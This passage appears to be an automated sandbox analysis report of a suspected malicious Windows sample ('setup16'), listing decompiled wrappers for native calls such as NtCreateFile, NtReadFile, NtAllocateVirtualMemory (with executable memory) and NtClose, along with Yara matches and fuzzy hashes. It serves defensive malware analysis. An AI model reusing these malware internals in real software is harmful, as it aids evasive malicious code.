4198da 32536->32537 32538 41be60 NtAllocateVirtualMemory 32537->32538 32539 4198f3 32538->32539 32545 419b94 32539->32545 32559 41bea0 32539->32559 32542 419b80 32543 41bee0 RtlFreeHeap 32542->32543 32544 419b8a 32543->32544 32544->32505 32546 41bee0 RtlFreeHeap 32545->32546 32547 419be9 32546->32547 32547->32505 32549 40760f 32548->32549 32550 407525 32548->32550 32549->32507 32550->32549 32551 4156a0 7 API calls 32550->32551 32553 407592 32551->32553 32552 4075b9 32552->32507 32553->32552 32554 41bee0 RtlFreeHeap 32553->32554 32554->32552 32556 408785 32555->32556 32558 4087dd 32556->32558 32562 40b940 32556->32562 32558->32531 32574 41a530 32559->32574 32563 40b96c 32562->32563 32564 40b98c 32563->32564 32569 41a1d0 32563->32569 32564->32558 32566 40b9af 32566->32564 32567 41a440 NtClose 32566->32567 32568 40b9ea 32567->32568 32568->32558 32570 41a1ec 32569->32570 32573 4a09710 LdrInitializeThunk 32570->32573 32571 41a207 32571->32566 32573->32571 32575 41a54c 32574->32575 32578 4a09a00 LdrInitializeThunk 32575->32578 32576 419b79 32576->32542 32576->32545 32578->32576 32580 407698 32579->32580 32581 4076d6 PostThreadMessageW 32580->32581 32582 4076e0 32580->32582 32581->32582 32582->32520 32584 40d9e3 32583->32584 32587 419e40 32584->32587 32588 419e5c 32587->32588 32591 4a09840 LdrInitializeThunk 32588->32591 32589 40da0e 32589->32520 32591->32589 32592->32435 32594 419f8c 32593->32594 32597 4a099a0 LdrInitializeThunk 32594->32597 32595 40d85e 32595->32441 32595->32442 32597->32595 32598->32446 32599->32450 32600->32454

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 0041A30A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 233 41a30a-41a361 call 41af60 NtCreateFile
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 78f91d07a3d18075188f1cb89e1d172b834fce5d5fdeb67014c791c7a7de1e3f
                                                                                                                                                                                                        • Instruction ID: 63d91951b0f7abf7b95e4b7c76bfbc6994407951038cd93bb1ede0602cdf1327
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78f91d07a3d18075188f1cb89e1d172b834fce5d5fdeb67014c791c7a7de1e3f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9701B2B2201108BFCB18CF88DC85EEB37A9EF8C754F158608FA0D97241C630E8518BA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A310 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 236 41a310-41a326 237 41a32c-41a361 NtCreateFile 236->237 238 41a327 call 41af60 236->238 238->237
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                                                                                                                                                                                        • Instruction ID: 22a17d5a8ca0ee81e299f457139f331d0ae15f1ba5b0ed3d189dcc3aa1234c62
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A3C0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 239 41a3c0-41a409 call 41af60 NtReadFile
                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                        			E0041A3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc64;
				E0041AF60( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                                                                                                                                                        0x0041a3c3
                                                                                                                                                                                                        0x0041a3cf
                                                                                                                                                                                                        0x0041a3d7
                                                                                                                                                                                                        0x0041a405
                                                                                                                                                                                                        0x0041a409

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtReadFile.NTDLL(004159C2,5D9515B3,FFFFFFFF,00415681,?,?,004159C2,?,00415681,FFFFFFFF,5D9515B3,004159C2,?,00000000), ref: 0041A405
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                                                        • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                                                                                                                                                                                        • Instruction ID: 73ffa567400af51592167d85ddd4e2221f8c27920a6f65a97cb7e9eff46762f8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99F0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158249BE0D97241D630E811CBA5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A4F0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 242 41a4f0-41a52d call 41af60 NtAllocateVirtualMemory
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041A4F0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc7c; // 0x3c7c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                                                                                                                                        0x0041a4ff
                                                                                                                                                                                                        0x0041a507
                                                                                                                                                                                                        0x0041a529
                                                                                                                                                                                                        0x0041a52d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409113,00000000), ref: 0041A529
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                                                        • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                                                                                                                                                                                        • Instruction ID: 0f6e90ac6ad316f0230f9505ffb1913ba8f116b783957ff2d7da3ee6bc7086c1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53F0F2B2210208ABDB14DF89DC81EAB77ADAF8C654F118109BA0897241C630E8118BA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A43A Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 248 41a43a-41a456 249 41a45c-41a469 NtClose 248->249 250 41a457 call 41af60 248->250 250->249
                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                        			E0041A43A(void* __eax, intOrPtr _a8, void* _a12) {
				long _t10;

				asm("popad");
				asm("daa");
				_t7 = _a8;
				_t2 = _t7 + 0x14; // 0x56c29f0f
				_t3 = _t7 + 0xc6c; // 0x409d7f
				E0041AF60( *_t2, _a8, _t3,  *_t2, 0, 0x2c);
				_t10 = NtClose(_a12); // executed
				return _t10;
			}




                                                                                                                                                                                                        0x0041a43b
                                                                                                                                                                                                        0x0041a43d
                                                                                                                                                                                                        0x0041a443
                                                                                                                                                                                                        0x0041a446
                                                                                                                                                                                                        0x0041a44f
                                                                                                                                                                                                        0x0041a457
                                                                                                                                                                                                        0x0041a465
                                                                                                                                                                                                        0x0041a469

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtClose.NTDLL(004159A0,?,?,004159A0,00409113,FFFFFFFF), ref: 0041A465
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                        • Opcode ID: b9301073047a70d22c850d531b33fcfaef684db6d39db47805c542120bfac9c1
                                                                                                                                                                                                        • Instruction ID: 5d4b3c8bab1ec5ea45b639f7387f25abbf4ffc90601bb78deda4ac2600d990b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9301073047a70d22c850d531b33fcfaef684db6d39db47805c542120bfac9c1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFE0C2722002146FD710EFD4DCCAED77BA8DF49724F208056FA5D5B242C530E60087E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A3BB Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 260 41a3bb-41a3bc NtCreateFile
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: ee4a70274ca1f02bfa6b4e40ce270a313fdac76c5e9c770cb2dfe28eee832430
                                                                                                                                                                                                        • Instruction ID: 2386d51e271d8ad14aa46bbaedf190072e5c599914b6fdb92582370545986c01
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee4a70274ca1f02bfa6b4e40ce270a313fdac76c5e9c770cb2dfe28eee832430
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDD017B6208109AF8B08CF98E885CAB73ACEB88700700450DB99D83140C630A8628BA5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A440 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041A440(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x14; // 0x56c29f0f
				_t3 = _t5 + 0xc6c; // 0x409d7f
				E0041AF60( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                                                                                                                                        0x0041a443
                                                                                                                                                                                                        0x0041a446
                                                                                                                                                                                                        0x0041a44f
                                                                                                                                                                                                        0x0041a457
                                                                                                                                                                                                        0x0041a465
                                                                                                                                                                                                        0x0041a469

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtClose.NTDLL(004159A0,?,?,004159A0,00409113,FFFFFFFF), ref: 0041A465
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                        • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                                                                                                                                                                                        • Instruction ID: 647376dfd9c4a3ead1cf8bf61973886ae708b244be9dddf4ec43f9330a142b27
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96D01772200218ABD620EB99DC89ED77BACDF48A64F118055BA4C5B242C530FA1086E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A098F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: d146f1817853b94a2ee59c19c7dc3fe93f5a0d49ba4d5e637a2415e69031a7ea
                                                                                                                                                                                                        • Instruction ID: 47a933667b098e873813dd73e242228ef0da2f05652c09aeb86f664d4e4d2545
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d146f1817853b94a2ee59c19c7dc3fe93f5a0d49ba4d5e637a2415e69031a7ea
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A90026160105502F10171694404616040A97D0285F91C422A1015556ECA65E992B171
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 39b8a10743ed757c6a9a4a6533907b8ecbf867554e27883474dc8edd236ac4ba
                                                                                                                                                                                                        • Instruction ID: f1b59ef1d700c38a85d065c82646c4525198273a2cbad7f0528dc595d8c11cf5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39b8a10743ed757c6a9a4a6533907b8ecbf867554e27883474dc8edd236ac4ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE90027120105413F11161694504707040997D0285F91C812A0415559D9696E952B161
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: b7c02f64f7e7012cdf22e0d00baf7c35b6283204bfe1c2a0ebd9f3f2cf57d7aa
                                                                                                                                                                                                        • Instruction ID: bb9d39b507f6f20174649ea7c95c2f669e4cc4600fcfcf64579588e92a6df72e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7c02f64f7e7012cdf22e0d00baf7c35b6283204bfe1c2a0ebd9f3f2cf57d7aa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A900261242091527545B16944045074406A7E0285791C412A1405951C8566F856E661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A099A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 4b572177abfc4b0059a025267ae39ce02e6f748dae1e0a558a4e544df98cc33d
                                                                                                                                                                                                        • Instruction ID: 50678324382ed2669d29d7d15cee7f7a275a033264b4cb92f9d1f92d3a81bf9d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b572177abfc4b0059a025267ae39ce02e6f748dae1e0a558a4e544df98cc33d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 859002A134105442F10061694414B060405D7E1345F51C415E1055555D8659EC527166
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A095D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: ce18c5a8980b3416065e6f2d3d4492b10a149e45477b691a6cd98b8279138469
                                                                                                                                                                                                        • Instruction ID: d548bc6ccddeec48c1a6d1a7d9860e8c1f8aa12c2cbe44f3e6d737595cef9f2d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce18c5a8980b3416065e6f2d3d4492b10a149e45477b691a6cd98b8279138469
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A9002A120205003610571694414616440A97E0245B51C421E1005591DC565E8917165
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 394d2c3ed6a3676b2e01dc9d44d460ee8a7001721d72d21852b06b817ef6dc39
                                                                                                                                                                                                        • Instruction ID: f162cc8aa8e474cdd15762e8ff8b75921b7eab36e4f1698da1f77f9e945ea27a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 394d2c3ed6a3676b2e01dc9d44d460ee8a7001721d72d21852b06b817ef6dc39
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D99002B120105402F14071694404746040597D0345F51C411A5055555E8699EDD576A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 2af271715b8104637036ed3cc408b1a2e7ab094d7ba9fdd52da43f33adb2d4f0
                                                                                                                                                                                                        • Instruction ID: 33cd8a63a725469cd84a3b475cf5c77a242897ac870feb64fe908dfb3725644b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2af271715b8104637036ed3cc408b1a2e7ab094d7ba9fdd52da43f33adb2d4f0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9900475311050033105F57D07045070447D7D53D5351C431F1007551CD771FC717171
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A096E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 2b72a8a51ff048d26a23c7d0772c3830b6380d51376710729cbe2621fa0c81e5
                                                                                                                                                                                                        • Instruction ID: 80b42e880ab4c4dca8e68a9cb1fec19750acc7c891d597045e1470347b67a948
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b72a8a51ff048d26a23c7d0772c3830b6380d51376710729cbe2621fa0c81e5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB9002712010D802F1106169840474A040597D0345F55C811A4415659D86D5E8917161
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 1486fb6afca02a22ad3f0dfb661a010bc202dc77c879a963df913c8870d753a6
                                                                                                                                                                                                        • Instruction ID: 256f107c41b3d24ca2b8807f4d293368aaa1cf9c7bb9f6d241120decbc52104f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1486fb6afca02a22ad3f0dfb661a010bc202dc77c879a963df913c8870d753a6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59900261601050426140717988449064405BBE1255751C521A0989551D8599E86566A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
